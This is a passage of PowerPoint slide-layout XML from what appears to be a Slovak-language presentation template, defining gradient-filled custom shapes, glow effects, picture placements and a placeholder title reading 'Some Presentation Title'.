              <a:gd name="connsiteX5" fmla="*/ 6656239 w 6691457"/>
              <a:gd name="connsiteY5" fmla="*/ 1790788 h 5065475"/>
              <a:gd name="connsiteX6" fmla="*/ 6483728 w 6691457"/>
              <a:gd name="connsiteY6" fmla="*/ 855719 h 5065475"/>
              <a:gd name="connsiteX7" fmla="*/ 6425082 w 6691457"/>
              <a:gd name="connsiteY7" fmla="*/ 754087 h 5065475"/>
              <a:gd name="connsiteX8" fmla="*/ 6366436 w 6691457"/>
              <a:gd name="connsiteY8" fmla="*/ 652455 h 5065475"/>
              <a:gd name="connsiteX9" fmla="*/ 5643355 w 6691457"/>
              <a:gd name="connsiteY9" fmla="*/ 35426 h 5065475"/>
              <a:gd name="connsiteX10" fmla="*/ 5642974 w 6691457"/>
              <a:gd name="connsiteY10" fmla="*/ 35330 h 5065475"/>
              <a:gd name="connsiteX11" fmla="*/ 5642974 w 6691457"/>
              <a:gd name="connsiteY11" fmla="*/ 35330 h 5065475"/>
              <a:gd name="connsiteX12" fmla="*/ 5642593 w 6691457"/>
              <a:gd name="connsiteY12" fmla="*/ 35235 h 5065475"/>
              <a:gd name="connsiteX13" fmla="*/ 4707967 w 6691457"/>
              <a:gd name="connsiteY13" fmla="*/ 207828 h 5065475"/>
              <a:gd name="connsiteX14" fmla="*/ 4606384 w 6691457"/>
              <a:gd name="connsiteY14" fmla="*/ 266502 h 5065475"/>
              <a:gd name="connsiteX15" fmla="*/ 753729 w 6691457"/>
              <a:gd name="connsiteY15" fmla="*/ 2491828 h 5065475"/>
              <a:gd name="connsiteX16" fmla="*/ 652146 w 6691457"/>
              <a:gd name="connsiteY16" fmla="*/ 2550502 h 5065475"/>
              <a:gd name="connsiteX17" fmla="*/ 35409 w 6691457"/>
              <a:gd name="connsiteY17" fmla="*/ 3273926 h 5065475"/>
              <a:gd name="connsiteX18" fmla="*/ 35314 w 6691457"/>
              <a:gd name="connsiteY18" fmla="*/ 3274307 h 5065475"/>
              <a:gd name="connsiteX19" fmla="*/ 35314 w 6691457"/>
              <a:gd name="connsiteY19" fmla="*/ 3274307 h 5065475"/>
              <a:gd name="connsiteX20" fmla="*/ 35218 w 6691457"/>
              <a:gd name="connsiteY20" fmla="*/ 3274688 h 5065475"/>
              <a:gd name="connsiteX21" fmla="*/ 207730 w 6691457"/>
              <a:gd name="connsiteY21" fmla="*/ 4209757 h 5065475"/>
              <a:gd name="connsiteX22" fmla="*/ 266376 w 6691457"/>
              <a:gd name="connsiteY22" fmla="*/ 4311389 h 5065475"/>
              <a:gd name="connsiteX23" fmla="*/ 325022 w 6691457"/>
              <a:gd name="connsiteY23" fmla="*/ 4413021 h 5065475"/>
              <a:gd name="connsiteX24" fmla="*/ 1048103 w 6691457"/>
              <a:gd name="connsiteY24" fmla="*/ 5030050 h 5065475"/>
              <a:gd name="connsiteX25" fmla="*/ 1048483 w 6691457"/>
              <a:gd name="connsiteY25" fmla="*/ 5030145 h 5065475"/>
              <a:gd name="connsiteX26" fmla="*/ 1048483 w 6691457"/>
              <a:gd name="connsiteY26" fmla="*/ 5030145 h 5065475"/>
              <a:gd name="connsiteX27" fmla="*/ 1048864 w 6691457"/>
              <a:gd name="connsiteY27" fmla="*/ 5030240 h 5065475"/>
              <a:gd name="connsiteX28" fmla="*/ 1983490 w 6691457"/>
              <a:gd name="connsiteY28" fmla="*/ 4857648 h 5065475"/>
              <a:gd name="connsiteX29" fmla="*/ 2085074 w 6691457"/>
              <a:gd name="connsiteY29" fmla="*/ 4798974 h 5065475"/>
              <a:gd name="connsiteX30" fmla="*/ 5937633 w 6691457"/>
              <a:gd name="connsiteY30" fmla="*/ 2573648 h 5065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691457" h="5065475">
                <a:moveTo>
                  <a:pt x="5937728" y="2573648"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6039311" y="2514974"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6288463" y="2366669"/>
                  <a:pt x="6555893" y="2165406"/>
                  <a:pt x="6656049" y="1791550"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6656049" y="1791455"/>
                  <a:pt x="6656049" y="1791264"/>
                  <a:pt x="6656144" y="1791169"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6656144" y="1791169"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6656144" y="1791169"/>
                  <a:pt x="6656144" y="1790883"/>
                  <a:pt x="6656239" y="1790788"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6756394" y="1416836"/>
                  <a:pt x="6625298" y="1108798"/>
                  <a:pt x="6483728" y="855719"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6425082" y="754087"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6425082" y="754087"/>
                  <a:pt x="6366436" y="652455"/>
                  <a:pt x="6366436" y="652455"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6218202" y="403186"/>
                  <a:pt x="6017034" y="135629"/>
                  <a:pt x="5643355" y="35426"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5643259" y="35426"/>
                  <a:pt x="5643069" y="35426"/>
                  <a:pt x="5642974" y="35330"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5642974" y="35330"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5642974" y="35330"/>
                  <a:pt x="5642688" y="35330"/>
                  <a:pt x="5642593" y="35235"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5268819" y="-64968"/>
                  <a:pt x="4960927" y="66191"/>
                  <a:pt x="4707967" y="207828"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4606384" y="266502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="753729" y="2491828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="652146" y="2550502"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="402995" y="2698806"/>
                  <a:pt x="135564" y="2900070"/>
                  <a:pt x="35409" y="3273926"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="35409" y="3274021"/>
                  <a:pt x="35409" y="3274212"/>
                  <a:pt x="35314" y="3274307"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35314" y="3274307"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="35314" y="3274307"/>
                  <a:pt x="35314" y="3274592"/>
                  <a:pt x="35218" y="3274688"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-64937" y="3648639"/>
                  <a:pt x="66160" y="3956678"/>
                  <a:pt x="207730" y="4209757"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="207730" y="4209757"/>
                  <a:pt x="266376" y="4311389"/>
                  <a:pt x="266376" y="4311389"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="325022" y="4413021"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="473256" y="4662290"/>
                  <a:pt x="674424" y="4929847"/>
                  <a:pt x="1048103" y="5030050"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1048198" y="5030050"/>
                  <a:pt x="1048388" y="5030050"/>
                  <a:pt x="1048483" y="5030145"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1048483" y="5030145"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1048483" y="5030145"/>
                  <a:pt x="1048769" y="5030145"/>
                  <a:pt x="1048864" y="5030240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1422638" y="5130444"/>
                  <a:pt x="1730531" y="4999284"/>
                  <a:pt x="1983490" y="4857648"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2085074" y="4798974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5937633" y="2573648"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat">
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="19000">
                  <a:schemeClr val="accent1"/>
                </a:gs>
                <a:gs pos="76000">
                  <a:schemeClr val="accent1">
                    <a:alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="0">
                  <a:srgbClr val="87CFD3"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="18900000" scaled="1"/>
              <a:tileRect/>
            </a:gradFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="1168400">
              <a:schemeClr val="accent1">
                <a:alpha val="7000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="1270000" dir="5400000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="accent1">
                <a:alpha val="54000"/>
              </a:schemeClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-SK" sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="!!LIGHT-TURQ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75F58DE5-EF1C-988C-6FA5-5A4C78318066}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12844176" y="-5072826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6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626E58E5-B601-44FB-3D7C-F245FE85A4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05646" y="1229464"/>
            <a:ext cx="3120056" cy="618632"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="!!LIGHT-CRIMSON">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C620FCAE-9AC5-4CD1-8EC5-D74FB0BB599A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10125883" y="-20391889"/>
            <a:ext cx="39337158" cy="39337158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69000">
                <a:schemeClr val="accent4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9" name="Nadpis 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78EECED7-9256-E7E0-1CCD-AF549B7538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95400" y="4079729"/>
            <a:ext cx="10291356" cy="2409250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>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr sz="9600" b="1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Some Presentation Title</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK" dirty="0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218A03CD-BF37-3D49-D692-B0C5D3E0E8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95401" y="8697179"/>
            <a:ext cx="2325914" cy="310122"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Zástupný objekt pre text 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{440532F8-39F5-27E4-646E-F3D07525B0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5401" y="7680226"/>
            <a:ext cx="10304418" cy="332399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2400" b="0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</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Zástupný objekt pre text 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{064DFBDE-675A-D6F9-E0DC-AC6DE88DF3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95401" y="8093867"/>
            <a:ext cx="10304418" cy="195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400" b="0" i="0" spc="200" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="50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648529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lobe">
    <p:bg bwMode="ltGray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Rectangle 687">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E49B2F8D-289C-712F-4D14-56E33F7792AD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5" name="!!LIGHT-TURQ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75F58DE5-EF1C-988C-6FA5-5A4C78318066}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7434649" y="293719"/>
            <a:ext cx="12282910" cy="12282910"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="55000">
                <a:schemeClr val="accent1">
                  <a:alpha val="0"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100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globe">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{078FB0D7-628B-7EF2-2B50-789F62259FF4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3663" y="-262342"/>
            <a:ext cx="23842134" cy="13411200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="691" name="Picture 690">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66C6722F-ADC9-4044-3C6A-C2767D61CBF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9020" y="-785559"/>
            <a:ext cx="24981900" cy="14052318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="689" name="!!LIGHT-TURQ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2C85C96-9889-D2C3-0F17-02489DDCBB43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-18786150" y="-17948760"/>
            <a:ext cx="35440872" cy="35440872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5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690" name="!!LIGHT-CRIMSON">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D49532EA-3484-EF42-C258-198BA2B4422A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5270601" y="-19374861"/>
            <a:ext cx="39337158" cy="39337158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69000">
                <a:schemeClr val="accent4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0" name="!!SHAPE">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69981505-D3DA-5160-7E94-4195B44B7B61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10678200" y="-486807"/>
            <a:ext cx="20014372" cy="15151006"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 5937728 w 6691457"/>
              <a:gd name="connsiteY0" fmla="*/ 2573648 h 5065475"/>
              <a:gd name="connsiteX1" fmla="*/ 6039311 w 6691457"/>
              <a:gd name="connsiteY1" fmla="*/ 2514974 h 5065475"/>
              <a:gd name="connsiteX2" fmla="*/ 6656049 w 6691457"/>
              <a:gd name="connsiteY2" fmla="*/ 1791550 h 5065475"/>
              <a:gd name="connsiteX3" fmla="*/ 6656144 w 6691457"/>
              <a:gd name="connsiteY3" fmla="*/ 1791169 h 5065475"/>
              <a:gd name="connsiteX4" fmla="*/ 6656144 w 6691457"/>
              <a:gd name="connsiteY4" fmla="*/ 1791169 h 5065475"/>
              <a:gd name="connsiteX5" fmla="*/ 6656239 w 6691457"/>
              <a:gd name="connsiteY5" fmla="*/ 1790788 h 5065475"/>
              <a:gd name="connsiteX6" fmla="*/ 6483728 w 6691457"/>
              <a:gd name="connsiteY6" fmla="*/ 855719 h 5065475"/>
              <a:gd name="connsiteX7" fmla="*/ 6425082 w 6691457"/>
              <a:gd name="connsiteY7" fmla="*/ 754087 h 5065475"/>
              <a:gd name="connsiteX8" fmla="*/ 6366436 w 6691457"/>
              <a:gd name="connsiteY8" fmla="*/ 652455 h 5065475"/>
              <a:gd name="connsiteX9" fmla="*/ 5643355 w 6691457"/>
              <a:gd name="connsiteY9" fmla="*/ 35426 h 5065475"/>
              <a:gd name="connsiteX10" fmla="*/ 5642974 w 6691457"/>
              <a:gd name="connsiteY10" fmla="*/ 35330 h 5065475"/>
              <a:gd name="connsiteX11" fmla="*/ 5642974 w 6691457"/>
              <a:gd name="connsiteY11" fmla="*/ 35330 h 5065475"/>
              <a:gd name="connsiteX12" fmla="*/ 5642593 w 6691457"/>
              <a:gd name="connsiteY12" fmla="*/ 35235 h 5065475"/>
              <a:gd name="connsiteX13" fmla="*/ 4707967 w 6691457"/>
              <a:gd name="connsiteY13" fmla="*/ 207828 h 5065475"/>
              <a:gd name="connsiteX14" fmla="*/ 4606384 w 6691457"/>
              <a:gd name="connsiteY14" fmla="*/ 266502 h 5065475"/>
              <a:gd name="connsiteX15" fmla="*/ 753729 w 6691457"/>
              <a:gd name="connsiteY15" fmla="*/ 2491828 h 5065475"/>
              <a:gd name="connsiteX16" fmla="*/ 652146 w 6691457"/>
              <a:gd name="connsiteY16" fmla="*/ 2550502 h 5065475"/>
              <a:gd name="connsiteX17" fmla="*/ 35409 w 6691457"/>
              <a:gd name="connsiteY17" fmla="*/ 3273926 h 5065475"/>
              <a:gd name="connsiteX18" fmla="*/ 35314 w 6691457"/>
              <a:gd name="connsiteY18" fmla="*/ 3274307 h 5065475"/>
              <a:gd name="connsiteX19" fmla="*/ 35314 w 6691457"/>
              <a:gd name="connsiteY19" fmla="*/ 3274307 h 5065475"/>
              <a:gd name="connsiteX20" fmla="*/ 35218 w 6691457"/>
              <a:gd name="connsiteY20" fmla="*/ 3274688 h 5065475"/>
              <a:gd name="connsiteX21" fmla="*/ 207730 w 6691457"/>
              <a:gd name="connsiteY21" fmla="*/ 4209757 h 5065475"/>
              <a:gd name="connsiteX22" fmla="*/ 266376 w 6691457"/>
              <a:gd name="connsiteY22" fmla="*/ 4311389 h 5065475"/>
              <a:gd name="connsiteX23" fmla="*/ 325022 w 6691457"/>
              <a:gd name="connsiteY23" fmla="*/ 4413021 h 5065475"/>
              <a:gd name="connsiteX24" fmla="*/ 1048103 w 6691457"/>
              <a:gd name="connsiteY24" fmla="*/ 5030050 h 5065475"/>
              <a:gd name="connsiteX25" fmla="*/ 1048483 w 6691457"/>
              <a:gd name="connsiteY25" fmla="*/ 5030145 h 5065475"/>
              <a:gd name="connsiteX26" fmla="*/ 1048483 w 6691457"/>
              <a:gd name="connsiteY26" fmla="*/ 5030145 h 5065475"/>
              <a:gd name="connsiteX27" fmla="*/ 1048864 w 6691457"/>
              <a:gd name="connsiteY27" fmla="*/ 5030240 h 5065475"/>
              <a:gd name="connsiteX28" fmla="*/ 1983490 w 6691457"/>
              <a:gd name="connsiteY28" fmla="*/ 4857648 h 5065475"/>
              <a:gd name="connsiteX29" fmla="*/ 2085074 w 6691457"/>
              <a:gd name="connsiteY29" fmla="*/ 4798974 h 5065475"/>
              <a:gd name="connsiteX30" fmla="*/ 5937633 w 6691457"/>
              <a:gd name="connsiteY30" fmla="*/ 2573648 h 5065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691457" h="5065475">
                <a:moveTo>
                  <a:pt x="5937728" y="2573648"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6039311" y="2514974"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6288463" y="2366669"/>
                  <a:pt x="6555893" y="2165406"/>
                  <a:pt x="6656049" y="1791550"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6656049" y="1791455"/>
                  <a:pt x="6656049" y="1791264"/>
                  <a:pt x="6656144" y="1791169"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6656144" y="1791169"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6656144" y="1791169"/>
                  <a:pt x="6656144" y="1790883"/>
                  <a:pt x="6656239" y="1790788"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6756394" y="1416836"/>
                  <a:pt x="6625298" y="1108798"/>
                  <a:pt x="6483728" y="855719"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6425082" y="754087"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6425082" y="754087"/>
                  <a:pt x="6366436" y="652455"/>
                  <a:pt x="6366436" y="652455"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6218202" y="403186"/>
                  <a:pt x="6017034" y="135629"/>
                  <a:pt x="5643355" y="35426"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5643259" y="35426"/>
                  <a:pt x="5643069" y="35426"/>
                  <a:pt x="5642974" y="35330"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5642974" y="35330"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5642974" y="35330"/>
                  <a:pt x="5642688" y="35330"/>
                  <a:pt x="5642593" y="35235"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5268819" y="-64968"/>
                  <a:pt x="4960927" y="66191"/>
                  <a:pt x="4707967" y="207828"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4606384" y="266502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="753729" y="2491828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="652146" y="2550502"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="402995" y="2698806"/>
                  <a:pt x="135564" y="2900070"/>
                  <a:pt x="35409" y="3273926"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="35409" y="3274021"/>
                  <a:pt x="35409" y="3274212"/>
                  <a:pt x="35314" y="3274307"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35314" y="3274307"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="35314" y="3274307"/>
                  <a:pt x="35314" y="3274592"/>
                  <a:pt x="35218" y="3274688"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-64937" y="3648639"/>
                  <a:pt x="66160" y="3956678"/>
                  <a:pt x="207730" y="4209757"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="207730" y="4209757"/>
                  <a:pt x="266376" y="4311389"/>
                  <a:pt x="266376" y="4311389"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="325022" y="4413021"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="473256" y="4662290"/>
                  <a:pt x="674424" y="4929847"/>
                  <a:pt x="1048103" y="5030050"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1048198" y="5030050"/>
                  <a:pt x="1048388" y="5030050"/>
                  <a:pt x="1048483" y="5030145"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1048483" y="5030145"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1048483" y="5030145"/>
                  <a:pt x="1048769" y="5030145"/>
                  <a:pt x="1048864" y="5030240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1422638" y="5130444"/>
                  <a:pt x="1730531" y="4999284"/>
                  <a:pt x="1983490" y="4857648"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2085074" y="4798974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5937633" y="2573648"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat">
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="19000">
                  <a:schemeClr val="accent1"/>
                </a:gs>
                <a:gs pos="76000">
                  <a:schemeClr val="accent1">
                    <a:alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="0">
                  <a:srgbClr val="87CFD3"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="18900000" scaled="1"/>
              <a:tileRect/>
            </a:gradFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="1168400">
              <a:schemeClr val="accent1">
                <a:alpha val="7000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="1270000" dir="5400000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="accent1">
                <a:alpha val="54000"/>
              </a:schemeClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-SK" sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Zástupný objekt pre text 6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1295401" y="7680226"/>
            <a:ext cx="10304418" cy="332399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2400" b="0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</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Zástupný objekt pre text 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1295401" y="8093867"/>
            <a:ext cx="10304418" cy="195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400" b="0" i="0" spc="200" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="50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</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK" dirty="0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626E58E5-B601-44FB-3D7C-F245FE85A47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205646" y="1229464"/>
            <a:ext cx="3120056" cy="61863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 userDrawn="1">
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="4079729"/>
            <a:ext cx="10291356" cy="2409250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>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr sz="9600" b="1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Some Presentation Title</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK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F281B37-560D-B024-7CBE-EBD57B2B706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95401" y="8697179"/>
            <a:ext cx="2325914" cy="31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52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de">
    <p:bg bwMode="ltGray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Rectangle 687">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E49B2F8D-289C-712F-4D14-56E33F7792AD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4278" name="Rectangle 4277">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C8B3533-C028-80EF-C5AD-95C0AEB80AF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="13935422" y="746966"/>
            <a:ext cx="3985032" cy="1246484"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="39000">
                <a:schemeClr val="accent4"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent3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1E851A9-3179-9BAE-E277-F9457FF5C91B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="14946127" y="8844642"/>
            <a:ext cx="5060950" cy="162660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="39000">
                <a:schemeClr val="accent4"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent3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689" name="!!LIGHT-TURQ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
